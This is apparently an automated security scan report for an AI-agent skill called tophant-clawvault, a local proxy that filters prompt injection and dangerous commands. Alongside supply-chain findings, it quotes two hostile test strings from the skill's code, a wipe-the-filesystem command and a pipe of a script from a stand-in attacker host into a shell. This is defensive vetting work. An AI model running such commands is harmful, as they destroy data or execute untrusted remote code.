tophant-clawvault Security Report — Low Risk | ClawSafe

25 /100

tophant-clawvault

AI security system protecting agents from prompt injection, data leakage, and dangerous commands via local HTTP proxy

ClawVault is a legitimate AI security tool with good documentation; the flagged IOCs are test strings not executed code, though there are minor supply chain concerns.

Skill Nametophant-clawvault

Duration40.0s

Enginepi

✓

Safe to install

Approve for use with caution: pin ClawVault to specific version before installation to mitigate supply chain risk.

Findings 3 items

Severity	Finding	Location
Medium	Unpinned package version range Supply Chain Install command uses 'clawvault>=0.1.0,<1.0.0' allowing any 0.x.x version including potentially malicious future releases `pinned_version = "clawvault>=0.1.0,<1.0.0"` → Pin to specific version: pip install clawvault==0.1.0 or use hash verification	`clawvault_manager.py:88`
Medium	GitHub fallback without integrity verification Supply Chain Fallback installation from GitHub tag '@v0.1.0' lacks checksum or hash verification `git+https://github.com/tophant-ai/[email protected]` → Use specific commit hash or package hash verification for GitHub installations	`clawvault_manager.py:98`
Low	SSL verification disabled in default config Sensitive Access Default config sets ssl_verify: False for MITM inspection, documented but risky `"ssl_verify": False` → Ensure tool runs only on trusted networks; document SSL bypass implications	`clawvault_manager.py:154`

Resource	Declared	Inferred	Status	Evidence
Shell	`WRITE`	`WRITE`	✓ Aligned	clawvault_manager.py:88 pip install
Filesystem	`WRITE`	`WRITE`	✓ Aligned	clawvault_manager.py:137 config write
Network	`READ`	`WRITE`	✓ Aligned	SECURITY.md documents MITM proxy
Filesystem	`READ`	`READ`	✓ Aligned	~/.ClawVault/config.yaml only

2 Critical 5 findings

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

clawvault_manager.py:401

💀

Critical Dangerous Command 危险 Shell 命令

curl evil.com | bash

clawvault_manager.py:402

🔗

Medium External URL 外部 URL

http://127.0.0.1:8766

SECURITY.md:51

🔗

Medium External URL 外部 URL

https://docs.openclaw.ai/gateway/security

SECURITY.md:256

📧

Info Email 邮箱地址

[email protected]

SECURITY.md:242

File Tree

5 files · 37.6 KB · 1120 lines

Python 1f · 581L Markdown 3f · 493L JSON 1f · 46L

├─ 🐍 clawvault_manager.py Python 581L · 21.4 KB

├─ 📝 README.md Markdown 79L · 2.2 KB

├─ 📝 SECURITY.md Markdown 262L · 8.7 KB

├─ 📋 skill.json JSON 46L · 1.9 KB

└─ 📝 SKILL.md Markdown 152L · 3.5 KB

Dependencies 3 items

Package	Version	Source	Known Vulns	Notes
`pyyaml`	`*`	pip	No	Not explicitly pinned in skill
`requests`	`*`	pip	No	Not explicitly pinned in skill
`clawvault`	`>=0.1.0,<1.0.0`	pypi/github	No	Version range unpinned - supply chain risk

Security Positives

✓ Comprehensive documentation including SECURITY.md with threat model

✓ Test IOCs (rm -rf, curl|bash) are test strings not executed code - legitimate detection testing

✓ All network calls are to localhost for proxy operations

✓ No credential harvesting or exfiltration detected

✓ No obfuscation or base64 execution observed

✓ Skill behavior matches documentation (MITM proxy for AI security)

Scan Report

Findings 3 items

File Tree

Dependencies 3 items

Security Positives